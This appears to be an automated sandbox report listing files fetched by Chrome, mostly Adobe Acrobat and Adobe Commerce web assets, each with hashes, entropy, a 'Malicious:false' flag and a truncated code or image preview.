                  Preview:"use strict";(self["webpackJsonp-viewer"]=self["webpackJsonp-viewer"]||[]).push([[7818],{t39f:e=>{e.exports=JSON.parse('{"verb.editpdf.addImage.dialogTitle.addImage":"Add Image","verb.editpdf.too.many.files":"Only 1 file can be uploaded for editing at a time","default":" ","titlebar.branding":"Adobe cloud storage","topbar.redirect.yourDocuments":"Your documents","topbar.redirect.documentCloud":"Adobe cloud storage","topbar.redirect.cloudStorage":"Adobe cloud storage","topbar.redirect.yourFiles":"Your files","topbar.redirect.sharedByYou":"Shared by you","topbar.redirect.sharedByOthers":"Shared by others","modernviewer.tooltip.home":"Go to Acrobat Home","tooltip.back":"Back","tooltip.home":"Home","tooltip.contextBoard":"File details and tools","tooltip.shareContextBoard":"Share File","tooltip.shareButton":"Share","modernviewer.arialabel.home":"Go to Home page","arialabel.back":"Back","arialabel.home":"Home","arialabel.contextBoard":"File details and tools","arialabel.shareContextBoard":"
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:SVG Scalable Vector Graphics image
                  Category:dropped
                  Size (bytes):2905
                  Entropy (8bit):3.962263100945339
                  Encrypted:false
                  SSDEEP:
                  MD5:FE87496CC7A44412F7893A72099C120A
                  SHA1:A0C1458C08A815DF63D3CB0406D60BE6607CA699
                  SHA-256:55CE3B0CE5BC71339308107982CD7671F96014256DED0BE36DC8062E64C847F1
                  SHA-512:E527C6CD2A3D79CA828A9126E8FF7009A540AA764082750D4FA8207C2B8439CA1FDC4459E935D708DC59DCFFE55FE45188EB5E266D1B745FCA7588501BC0117D
                  Malicious:false
                  Reputation:unknown
                  Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M30.422,29.092a3.493,3.493,0,0,1,1.324.261,3.381,3.381,0,0,1,1.132.749q.366.366.827.775t.949.854q.488.444.941.932a9.974,9.974,0,0,1,.819,1A4.951,4.951,0,0,1,37,34.736a3.133,3.133,0,0,1,.218,1.15,3.493,3.493,0,0,1-.261,1.324,3.381,3.381,0,0,1-.749,1.132q-.888.888-1.6,1.568a8.753,8.753,0,0,1-1.489,1.15,6.17,6.17,0,0,1-1.716.705A9.367,9.367,0,0,1,29.151,42a13.73,13.73,0,0,1-3.9-.592A21.891,21.891,0,0,1,21.26,39.77a27.749,27.749,0,0,1-3.885-2.491,34.863,34.863,0,0,1-3.6-3.153,34.6,34.6,0,0,1-3.127-3.606,27.717,27.717,0,0,1-2.456-3.876A22.2,22.2,0,0,1,6.584,22.69,13.485,13.485,0,0,1,6,18.866,9.453,9.453,0,0,1,6.235,16.6a6.2,6.2,0,0,1,.7-1.707,8.848,8.848,0,0,1,1.141-1.489q.679-.723,1.585-1.611a3.381,3.381,0,0,1,1.132-.749,3.493,3.493,0,0,1,1.324-.261,3.3,3.3,0,0,1,1.681.47,8.648,8.648,0,0,1,1.542,1.15,17.725,17.725,0,0,1,1.376,1.428q.645.
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (63573)
                  Category:downloaded
                  Size (bytes):530274
                  Entropy (8bit):5.517149388928153
                  Encrypted:false
                  SSDEEP:
                  MD5:68AB11E461613C3275BABC7F0B6F28D7
                  SHA1:F976350396C596690DFC8769E01A6616D71E1D2C
                  SHA-256:D93DF2993D3038BB18287DE012E525D467AE048428D0543A9D0F6A54B203B76B
                  SHA-512:6C1C6EF00C746148FF02A27584067D8E411D010E6805EE88BFB526F0581FB44B755A884758412E82CABDB347DED1C59C3AD871514BEAA43C1C30BE618CEE947E
                  Malicious:false
                  Reputation:unknown
                  URL:https://commerce.adobe.com/store/_next/static/chunks/pages/payment-2dc86ae6c426cb30.js
                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[252],{938433:function(e,t,n){"use strict";n.d(t,{J:function(){return m}});var r=n(127043),o=n(943077),a=n(116674),i=n(38745),l=n(385266),c=n(75467),s=n(667294),u=n(214307),d=n(205603);const p=({content:e,variables:t,onPrimaryCtaClicked:n,onSecondaryCtaClicked:o})=>{const a=l.l.createEntry({iconAriaLabel:e.get(r.C.ariaIconLabel),title:e.get(r.C.title),message:e.get(r.C.message),confirmLabel:e.get(r.C.ctaButtonLabel),cancelLabel:e.get(r.C.secondaryCtaButtonLabel)},e.locale);return s.createElement(c.n,{content:a,variant:e.get(r.C.iconType),variables:t,onPrimaryCtaClicked:n,onSecondaryCtaClicked:o})},f=({onClose:e})=>e(),m=(0,d.T)((({control:e,onClose:t})=>{const{aemResourceName:n,error:r,locale:o,onPrimaryCtaClicked:l,onSecondaryCtaClicked:c}=e[0];if(!r)return null;const u=()=>{l({onClose:t})},d=()=>{c({onClose:t})};return s.createElement("div",{"data-testid":"app-error-message-dialog"},s.createElement(a.f,{locale:o},s.createElement
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Unicode text, UTF-8 text, with very long lines (65502), with no line terminators
                  Category:downloaded
                  Size (bytes):420072
                  Entropy (8bit):5.126567749310819
                  Encrypted:false
                  SSDEEP:
                  MD5:6B246F5ECCC402432B1136C70122EF2C
                  SHA1:4ACC3217E2251E0C3DAFC93E308035A9741E67C9
                  SHA-256:FF3507E6486D3C3E789A547E0AAF8788D9C9726A111BBBD891EC173B2782543C
                  SHA-512:31DA130CA140F9C85E185016879FD323A530EF3E76CDCB7D6E31432E83B0D6066E25CC70F690CEFBE8761E6BB42C93E817301EBB37A75A0B831AD194F9CE03A7
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-core/3.71.0/dc-spectrum-v3-core.css
                  Preview:.Dniwja_i18nFontFamily{font-synthesis:weight;font-family:adobe-clean,Source Sans Pro,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Ubuntu,Trebuchet MS,Lucida Grande,sans-serif}.Dniwja_i18nFontFamily:lang(ar){font-family:myriad-arabic,adobe-clean,Source Sans Pro,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Ubuntu,Trebuchet MS,Lucida Grande,sans-serif}.Dniwja_i18nFontFamily:lang(he){font-family:myriad-hebrew,adobe-clean,Source Sans Pro,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Ubuntu,Trebuchet MS,Lucida Grande,sans-serif}.Dniwja_i18nFontFamily:lang(zh){font-family:adobe-clean-han-traditional,source-han-traditional,MingLiu,Heiti TC Light,sans-serif}.Dniwja_i18nFontFamily:lang(zh-Hans){font-family:adobe-clean-han-simplified-c,source-han-simplified-c,SimSun,Heiti SC Light,sans-serif}.Dniwja_i18nFontFamily:lang(zh-Hant){font-family:adobe-clean-han-traditional,source-han-traditional,MingLiu,Microsoft JhengHei UI,Microsoft JhengHei,Heiti TC Light,sans-serif}.Dniwja_i18nFontFamily
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:RIFF (little-endian) data, Web/P image
                  Category:dropped
                  Size (bytes):9648
                  Entropy (8bit):7.9099172475143416
                  Encrypted:false
                  SSDEEP:
                  MD5:4946EB373B18D178C93D473489673BB6
                  SHA1:16477ACB73B63CA251D37401249E7E4515FEBD24
                  SHA-256:666BC574C9F3FB28A8AC626FA8105C187C2A313736494A06BD5A937473673C92
                  SHA-512:F684B90B748DC8399F76C5D8F94AF6C4E6869143F18D19CE435B25EAA14E9647B120467BDD0795895676DC0CCCDEABF82BEB2F46CE2C5BF4C58ED9C134F30C48
                  Malicious:false
                  Reputation:unknown
                  Preview:RIFF.%..WEBPVP8X....0.........ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPH......0....n.mu..G..t042.....@...`[...%...6....9AD.'@.,f.B...+..+..+..W&.p.....h.......f.-...+.....m...n....E....O].+R.&Q..#.X.ip4..p......\O...\/....9.5.a..DfZ,K....8.....Z..2..z......t.......|.I.(..6E.D.}.C..OQD$S}iZ...[D.......q`(...@../.NQ......+"b%.X.D".G.*...0G...".2........x.O......7......E..&....e.F..4...K>.M..Pd.B...@'o./te..[.f....4[..a..x...9#.@$.=...t..=..t_.W....[..f.|fv...N...c6..k4}.9.7.....f.F3.4[...a...;.m.@N.n.0.....n.G[c.H.}..t.{..;....G...2.::..].0....
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (49043)
                  Category:dropped
                  Size (bytes):203589
                  Entropy (8bit):5.290647757540628
                  Encrypted:false
                  SSDEEP:
                  MD5:FC9F097A7C960A2B7D17067AF97FA3AA
                  SHA1:C4C081D1AC1DD379E580D7A0A029E525322378AB
                  SHA-256:AF779F26C386872654519E2E5B16974A4D67D7752AD0C4F0E2594229CF367616
                  SHA-512:63C2ED1AE67FDBC80B2EDB02F4EA1CF4BC14B8E2306698558DE5342767628E0BA6E79063E1838A7B17D1B59EAECD596D7D9402418EF56FBE62758A3F9ABB03C4
                  Malicious:false
                  Reputation:unknown
                  Preview:.Confirmation__confirmationContainer__oVRUa{display:flex;flex-direction:unset;justify-content:center;align-items:flex-start;padding:40px 0}@media (max-width:1023px){.Confirmation__confirmationContainer__oVRUa{flex-direction:column;padding:30px 0;margin:auto}}@media (max-width:599px){.Confirmation__confirmationContainer__oVRUa{max-width:100%;padding-left:16px;padding-right:16px}.Confirmation__confirmationMobileSimpleLayoutContainer__dzp0n{padding:0}}.Confirmation__bannerContainer__ul6ai{display:flex;flex-direction:column;justify-content:center;align-items:flex-start;padding:40px 0}@media (max-width:1023px){.Confirmation__bannerContainer__ul6ai{flex-direction:column;padding:30px 0;margin:auto}}@media (max-width:599px){.Confirmation__bannerContainer__ul6ai{max-width:100%;padding-left:16px;padding-right:16px}.Confirmation__bannerMobileSimpleLayoutContainer__HNGso{max-width:100%;background:var(--spectrum-gray-50,#fff);padding:32px;padding:var(--spectrum-global-dimension-size-400,32px);borde
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (65536), with no line terminators
                  Category:downloaded
                  Size (bytes):101102
                  Entropy (8bit):5.30175024332842
                  Encrypted:false
                  SSDEEP:
                  MD5:7DB41EC1D91900B47E12B4C350537CC5
                  SHA1:FBFF9843326518F2AB3495C432AD522EBBF981AA
                  SHA-256:A0CECF32554E067EA8D8E460CBFD8BE285E5E141A2538A81326887E43B2C44DA
                  SHA-512:89B4D48923A082E8ECEB1C18246075F0015C8BB82608519E23741000665F32D83AAA23C596D8FB4122EA2A65572792C2F363AF650C9FF87F26A167B7BDC0F74B
                  Malicious:false
                  Reputation:unknown
                  URL:https://commerce.adobe.com/store/_next/static/chunks/main-bb878abeca423fe4.js
                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[179],{606077:function(e,t){"use strict";function r(e,t,r,n,a,o,i){try{var u=e[o](i),c=u.value}catch(s){return void r(s)}u.done?t(c):Promise.resolve(c).then(n,a)}function n(e){return function(){var t=this,n=arguments;return new Promise((function(a,o){var i=e.apply(t,n);function u(e){r(i,a,o,u,c,"next",e)}function c(e){r(i,a,o,u,c,"throw",e)}u(void 0)}))}}Object.defineProperty(t,"default",{enumerable:!0,get:function(){return n}})},272335:function(e,t){"use strict";function r(){return r=Object.assign||function(e){for(var t=1;t<arguments.length;t++){var r=arguments[t];for(var n in r)Object.prototype.hasOwnProperty.call(r,n)&&(e[n]=r[n])}return e},r.apply(this,arguments)}function n(){return r.apply(this,arguments)}Object.defineProperty(t,"default",{enumerable:!0,get:function(){return n}})},163763:function(e,t){"use strict";function r(e){return e&&e.__esModule?e:{default:e}}Object.defineProperty(t,"default",{enumerable:!0,get:function(
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:RIFF (little-endian) data, Web/P image
                  Category:downloaded
                  Size (bytes):1298
                  Entropy (8bit):6.665390877423149
                  Encrypted:false
                  SSDEEP:
                  MD5:32CA2081553E969F9FDD4374134521AD
                  SHA1:7B09924C4C3D8B6E41FE38363E342DA098BE4173
                  SHA-256:216FC342A469AA6A005B2EACC24622095E5282D3E9F1AE99CE54C27B92EC3587
                  SHA-512:F75749C6344FCD7BF06872A3678BB2EB4CAE2DDC31CC5D1EE73EFBA843705577841667733A83163AF4336EC8A32DF93E7A36155BD6282D7BB86159644975948C
                  Malicious:false
                  Reputation:unknown
                  URL:https://4fsv.iatrivvbe.com/klS2ksg8pK1cqvs4GFqEV1HgWcdnwIXmQpfzXZkw789KPu8E84zxk1Ok7v92OkwtSqqwsHlW2ab230
                  Preview:RIFF....WEBPVP8X....0...k.....ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPHX.....\m{.z..........T ..Q....R..*.X....U`..@......Yyy..<q.."b..a....K._.....jH.*...}q..........^.-.\.4. &.H~.q..H.q.'.t..p....0)...X.....8./.... ..6.#H..Y..../...E>.#.tv....9.\.p5......h......1.{@.k].(1...B.........u.n....=....sX...*..I.c]r....S.....u.a...X.....Pi..q.$73..ga..h%9.S.l.....}....^%.@:Q....we8x..j..3.^.}5.fFtZ...3....<. x.s....d@(./.<].y...m.....T..........T.P`....5..<qYl.g..k..N. `_...f....yN.R.PB..p|..-.%.`y.._.]C.v.<.Y...V..I..(.c....>...........k....nt
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (10366)
                  Category:downloaded
                  Size (bytes):10412
                  Entropy (8bit):5.406094135469951
                  Encrypted:false
                  SSDEEP:
                  MD5:0B14B8F3730F1F75A0A1FD07138CA369
                  SHA1:933E0556EEC85768D5D877A3AC59579DF760BA0C
                  SHA-256:B8DF84EF1DB222E24A7824B05D830101B41119F14C47146810A807610EE14878
                  SHA-512:C648D294E3C12DE7C853CEB5C0D572680C231F52E4FE002B4246AADB81DE6AA2797A6BF1DAEF8E7FD7562EBAC2E5D1CA074C4C094F3AC8D0418C9FFB8F3B8E7A
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-global-nav-dropin/3.58.0_3.586.0/400-chunk.js
                  Preview:(self["webpackJsonp-global-nav"]=self["webpackJsonp-global-nav"]||[]).push([[400],{AXyZ:e=>{"use strict";e.exports=function(e){var t=[];return t.toString=function toString(){return this.map((function(t){var n=function cssWithMappingToString(e,t){var n=e[1]||"",r=e[3];if(!r)return n;if(t&&"function"==typeof btoa){var o=function toComment(e){var t=btoa(unescape(encodeURIComponent(JSON.stringify(e)))),n="sourceMappingURL=data:application/json;charset=utf-8;base64,".concat(t);return"/*# ".concat(n," */")}(r),i=r.sources.map((function(e){return"/*# sourceURL=".concat(r.sourceRoot||"").concat(e," */")}));return[n].concat(i).concat([o]).join("\n")}return[n].join("\n")}(t,e);return t[2]?"@media ".concat(t[2]," {").concat(n,"}"):n})).join("")},t.i=function(e,n,r){"string"==typeof e&&(e=[[null,e,""]]);var o={};if(r)for(var i=0;i<this.length;i++){var a=this[i][0];null!=a&&(o[a]=!0)}for(var s=0;s<e.length;s++){var c=[].concat(e[s]);r&&o[c[0]]||(n&&(c[2]?c[2]="".concat(n," and ").concat(c[2]):c[2]=
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (65536), with no line terminators
                  Category:downloaded
                  Size (bytes):7006639
                  Entropy (8bit):5.754231278936297
                  Encrypted:false
                  SSDEEP:
                  MD5:1377C937D97E168F098E4CCEA1011094
                  SHA1:48BFC07FA0CE7EFAFD17D555F9467E6AE4F31A9C
                  SHA-256:DD365C9E475E2F7C026EEDC2B69954323B2957737F15E75C0D598C0B4454E198
                  SHA-512:CC6969DD579A22424905005ABCF496339A2F2446462AC8CDC142C7F23E606A789410C2F67FB9698AB14FE84B2F5DA24C861EF410045FDD4DEE34F394028B206F
                  Malicious:false
                  Reputation:unknown
                  URL:https://commerce.adobe.com/store/_next/static/chunks/pages/_app-3feaccc9b4d9a6db.js
                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[888,942],{579336:function(e,t,n){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.AlertMedium=s;var r,o=(r=n(667294))&&r.__esModule?r:{default:r};function i(){return i=Object.assign||function(e){for(var t=1;t<arguments.length;t++){var n=arguments[t];for(var r in n)Object.prototype.hasOwnProperty.call(n,r)&&(e[r]=n[r])}return e},i.apply(this,arguments)}function a(e,t){if(null==e)return{};var n,r,o=function(e,t){if(null==e)return{};var n,r,o={},i=Object.keys(e);for(r=0;r<i.length;r++)n=i[r],t.indexOf(n)>=0||(o[n]=e[n]);return o}(e,t);if(Object.getOwnPropertySymbols){var i=Object.getOwnPropertySymbols(e);for(r=0;r<i.length;r++)n=i[r],t.indexOf(n)>=0||Object.prototype.propertyIsEnumerable.call(e,n)&&(o[n]=e[n])}return o}function s(e){var t=e.scale,n=void 0===t?"M":t,r=a(e,["scale"]);return o.default.createElement("svg",i({},r,r),"L"===n&&o.default.createElement("path",{d:"M10.563 2.206l-9.249 16.55a.5.5 0 0 0 .436.744h
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Unicode text, UTF-8 text, with very long lines (65520), with no line terminators
                  Category:downloaded
                  Size (bytes):139753
                  Entropy (8bit):5.5257405654785945
                  Encrypted:false
                  SSDEEP:
                  MD5:C1D7BDA130D81A341365ABF58CD874C8
                  SHA1:4C473F18FA9B7865655C838604FD1662A92827C0
                  SHA-256:8B22B98BF9E4C96D9A14567778568FACEB858FE625952CB6F26C595B7FD7DF3D
                  SHA-512:71DDD5AB9ABD887443646FC02C09E896067B9332F17C1434C66E2537093E6731A9832DF230CC5390A32EA92E41634D4CEC7D398DAABD1AF0349CF884DA8EB705
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-comments-dropin/3.59.4_2.1115.1/RHComments-expandedPanelContainer-chunk.js
                  Preview:(self["webpackJsonp-comments"]=self["webpackJsonp-comments"]||[]).push([[1360],{olML:(e,n,t)=>{"use strict";n.o=function A4uAdd(e){var n=_extends({},e);return o.default.createElement("svg",_extends({viewBox:"0 0 36 36"},n,n),o.default.createElement("path",{fillRule:"evenodd",d:"M29,16H20V7a1,1,0,0,0-1-1H17a1,1,0,0,0-1,1v9H7a1,1,0,0,0-1,1v2a1,1,0,0,0,1,1h9v9a1,1,0,0,0,1,1h2a1,1,0,0,0,1-1V20h9a1,1,0,0,0,1-1V17A1,1,0,0,0,29,16Z"}))};var o=function _interopRequireDefault(e){return e&&e.__esModule?e:{default:e}}(t("YWiy"));function _extends(){return _extends=Object.assign?Object.assign.bind():function(e){for(var n=1;n<arguments.length;n++){var t=arguments[n];for(var o in t)Object.prototype.hasOwnProperty.call(t,o)&&(e[o]=t[o])}return e},_extends.apply(this,arguments)}},"889w":(e,n,t)=>{"use strict";t.d(n,{A:()=>s});var o=t("DM6e"),r=t("klCL"),i=t.n(r);const a="safari",p="mobile safari",m="firefox",getBrowser=()=>(new(i())).getBrowser(),isSafari=()=>{const e=getBrowser().name.toLowerCase();r
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (19404)
                  Category:downloaded
                  Size (bytes):19450
                  Entropy (8bit):5.588525053491922
                  Encrypted:false
                  SSDEEP:
                  MD5:2F2F6364DE6B128473D3F37C100CBC01
                  SHA1:866BB9EDFCD1CDD6BDE263790A9C124F64FA6BF7
                  SHA-256:73C8CD4F4B887BB9E588E7F5ECF9430A2851D9C98DCE5DC6EB84960B863096B0
                  SHA-512:1870CF0B021254078CC1DFB2B731477154906951EBF2204023718DD9B065C8CDA1E02B6526164C9BCD8BD215BABA91671A71ADE3681BBD619E7A2FF5AD7F5F9F
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-global-nav-dropin/3.58.0_3.586.0/bootstrap.js
                  Preview:(()=>{var e,r,t,n,o={"DH/Q":(e,r,t)=>{"use strict";t.d(r,{c:()=>urlWithoutQueryParam});var n=t("plsW");const urlWithoutQueryParam=(e,r)=>{const t=n.router.getQueryParams();if(t&&t[r]&&delete t[r],t){let r=Object.keys(t).reduce(((e,r)=>`${e}${0===e.length?"?":"&"}${encodeURIComponent(r)}=${encodeURIComponent(t[r])}`),"");return""===r&&(r="?"),n.router.withQueryParams(`${n.discovery.dropins[e].router_path}`,{search:r})}return n.router.withQueryParams(`${n.discovery.dropins[e].router_path}`)}},Issy:(e,r,t)=>{"use strict";t.d(r,{F:()=>getMessage,Z:()=>o});var n=t("plsW");const loadTranslations=e=>(t.p=n.discovery.dropins["nav-bar"].public_path,t("AWKe")(`./${e}.json`).catch((()=>t.e(818).then(t.t.bind(t,"t39f",19))))),getMessage=e=>loadTranslations(n.locale2.getLocale()).then((r=>{const t=r[e];if(t)return t;throw new Error(`No translation for ${e}`)})),o=loadTranslations},r16C:(e,r,t)=>{var n=t("YWiy");function SDCMsTeamsAcrobatTrefoil32N(e){return n.createElement("svg",e,[n.createElement(
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (12264), with no line terminators
                  Category:downloaded
                  Size (bytes):12264
                  Entropy (8bit):5.160007275888605
                  Encrypted:false
                  SSDEEP:
                  MD5:EC181F707D290848E5E2C15CE91F4C21
                  SHA1:AE30CB55B98F5732691E4C497F4FD069B9C4E283
                  SHA-256:667198DCB0BA24404293D6AB0CE549F75579CFF2E1FC41DFFD209DBA48447BC1
                  SHA-512:B8C8847580335BFDDDF8C881DB5DFC411AAEB13E65B5C24542EFD896527831423A13A14F370345899202385CC6DCCD69461CEF821AC292575FDEABB4A9224A36
                  Malicious:false
                  Reputation:unknown
                  URL:https://commerce.adobe.com/mini-apps/_next/static/chunks/2498-58207d7313f7a0f3d969.js
                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[2498],{22584:function(e,o,a){a.d(o,{S3:function(){return n},Bw:function(){return m},kF:function(){return r},A4:function(){return d}});var t=a(67294),c=a(34155),n={LOCAL:"local",STAGE:"stage",PRODUCTION:"production"},i=function(){return c.env.APP_ENV||c.env.REACT_APP_ENV};function m(e){var o;return void 0===e&&(e=i()),e&&"string"===typeof e&&(o=n[e.toUpperCase()]),o||n.PRODUCTION}var s=t.createContext(m(i())),r=function(){return(0,t.useContext)(s)},d=function(e){var o=e.value,a=e.children;return t.createElement(s.Provider,{value:o||m(i())},a)}},71575:function(e,o,a){a.r(o),a.d(o,{EnvProvider:function(){return t.A4},envNames:function(){return t.S3},getValidEnvironment:function(){return t.Bw},useEnv:function(){return t.kF}});var t=a(22584)},10863:function(e,o,a){o.P=void 0;var t=a(53523);const c={directives:{defaultSrc:["'self'"],connectSrc:["'self'","commerce-stg.adobe.com","*.go-mpulse.net","*.akstat.io","redeem-stg.a
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (8882)
                  Category:downloaded
                  Size (bytes):8933
                  Entropy (8bit):5.293904668507514
                  Encrypted:false
                  SSDEEP:
                  MD5:091BD88778E7A881C979AD39CDD97595
                  SHA1:C4E6D4B7B649F0033DE4E01049C430D710FBCAA1
                  SHA-256:D32B4AC358697CD89A5D6E15D67E1D8C90571FC9F3AB1DD65E86448C07F174E1
                  SHA-512:CB4D6CBD7EE793D1E72DFA4D3A8D38A318606144EFB7BD628A348BFB1B12DEB454C3737E3B1A812ACEA0CFAB3A4F94D62B18204F10BFE014D355B5C0D2F91625
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-web-app-dropin/3.71.0_2.210.0/web-access-api.js
                  Preview:"use strict";(self["webpackJsonp-web-app"]=self["webpackJsonp-web-app"]||[]).push([[374],{eidH:(e,t,r)=>{r.r(t),r.d(t,{default:()=>DCWebAccessAPI});var s=r("plsW"),i=r("avxk");function ownKeys(e,t){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var s=Object.getOwnPropertySymbols(e);t&&(s=s.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),r.push.apply(r,s)}return r}function _objectSpread(e){for(var t=1;t<arguments.length;t++){var r=null!=arguments[t]?arguments[t]:{};t%2?ownKeys(Object(r),!0).forEach((function(t){_defineProperty(e,t,r[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):ownKeys(Object(r)).forEach((function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(r,t))}))}return e}function _defineProperty(e,t,r){return(t=function _toPropertyKey(e){var t=function _toPrimitive(e,t){if("object"!=typeof e||null===e)return e;var r=e[Symbol.toPrimitive];if(void 0!==r){var s=r.call(e,t||"d
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (2564)
                  Category:downloaded
                  Size (bytes):2614
                  Entropy (8bit):5.227990507261766
                  Encrypted:false
                  SSDEEP:
                  MD5:55DCC71C4C24AF7891EBE63F357C0DA7
                  SHA1:22019F3A5D742A727180EED5B56C5212BD7F3AAC
                  SHA-256:AEF5B580FE7025D557605248E463009EAC9B02CF775030F71A50D6FA5D340ED5
                  SHA-512:5559AFB00EF1308001C277928E085C9F6C6AC7CFD4056E5C259DD02691FDD69964F7578443979B20B0319C216911498CB797F3C766D1FD2F53666B6898E213B3
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-web-app-dropin/3.71.0_2.210.0/migration-api.js
                  Preview:"use strict";(self["webpackJsonp-web-app"]=self["webpackJsonp-web-app"]||[]).push([[619],{d1dY:(i,t,e)=>{e.r(t),e.d(t,{KNOWN_STATUS:()=>n,default:()=>o});var r=e("plsW");const n={LOCK_SCHEDULED:"LOCK_SCHEDULED",LOCKED:"LOCKED",DEFERRED:"DEFERRED",ABORTED:"ABORTED",COMPLETED:"COMPLETED"},s=r.logging.getLogger("AcpMigrationApi");class AcpMigrationApi{constructor(){var i=this;this.dcApiListener=function(t,e){let r=arguments.length>2&&void 0!==arguments[2]?arguments[2]:{};const{headers:n={}}=r;if(n["x-acp-migration-info"]){const t=n["x-acp-migration-info"],e=i.parseMigrationHeader(t);i.currentMigrationInfo=e,i.notifyListeners(e)}},this.dcApiErrorListener=(i,t,e)=>{if(423===e.code||403===e.code){var r,n;const i=null===(r=e.details)||void 0===r||null===(n=r.headers)||void 0===n?void 0:n["x-acp-migration-info"];if(i){const t=this.parseMigrationHeader(i);this.currentMigrationInfo=t,this.notifyListeners(t)}}},this.notificationListener=()=>{r.providers["get-unc-obj"]().then((i=>{i.RegisterObserv
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (4463)
                  Category:downloaded
                  Size (bytes):4464
                  Entropy (8bit):5.273793281217392
                  Encrypted:false
                  SSDEEP:
                  MD5:1394ECEBCD2884525807B88B36E7936A
                  SHA1:ACD07DB156ECFDD8CF481E8E5A7A42A71DD2EB51
                  SHA-256:F186B87156FB1623C0F0B92DC174F6474442FCE5E7B97E684002D9B956684AE4
                  SHA-512:7902E8BB8CC47E24180753EE0ED510778116693C43DA38A35870BDCCC1E20B99E68D97332E12122F04640FB29789942F7461ED726DC01671F56697E2CF18FADC
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/marketingtech/main.standard.min.js
                  Preview:!function(){"use strict";var e=window,t=document,n=Object.defineProperty,a="replace",o=function(e){return e=e[a](/%2523access_token%253D.*?%2526/gim,"%2526")[a](/%23access_token%3D.*?%26/gim,"%26")[a](/#access_token=.*?&/gim,"&")[a](/information=[^\&]+/,"")[a](/puser=[^\&]+/,"")[a](/fnuser=[^\&]+/,"")[a](/lnuser=[^\&]+/,"")};function i(){try{var e="referrer",a=t[e],i=o(a);i!==a&&n(t,e,{configurable:!0,value:i})}catch(e){}}var r=t.head,l=e.marketingtech,c=decodeURIComponent;function d(e){var n,a,o,i;for(a=0,o=(n=t.cookie?t.cookie.split("; "):[]).length;a<o;a++)if(i=n[a],c(i.substr(0,i.indexOf("=")))===e)return c(i.substr(i.indexOf("=")+1))}function s(){var n,a,o,i="alloy-prehiding",c="@keyframes alloyShow{from {opacity: 0.01;} to {opacity: 1;}}body,.personalization-container{opacity:0.01 !important;animation: 0s 3s forwards alloyShow}",s=3e3;if(t.getElementById("feds-script")&&(i="manual-prehiding"),a=t.getElementById(i),o=function(e){try{e&&e.parentNode&&e.parentNode.removeChild(e)}cat
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (402)
                  Category:downloaded
                  Size (bytes):455
                  Entropy (8bit):5.4157611176840685
                  Encrypted:false
                  SSDEEP:
                  MD5:18DEF6AC418C37C6F60777556A8F1751
                  SHA1:08BA9B7E9EE877C7F66183E898BF5E2309714DCE
                  SHA-256:BA1082ACC5FDE97EFCDF6AAECF3084934B87016C43F4CF1AC2C92057800FBB66
                  SHA-512:A5A801C557575501D8A6982471204096CD890151F9C3D19A346AB2E6E9FEA88A175C5EEE96AA3E2E22E59871B1A36043ED7BE42249BAC1BBDA8A387E119DE8F7
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-ccverbs-dropin/3.17.1_2.303.0/atomic-thumbnail.js
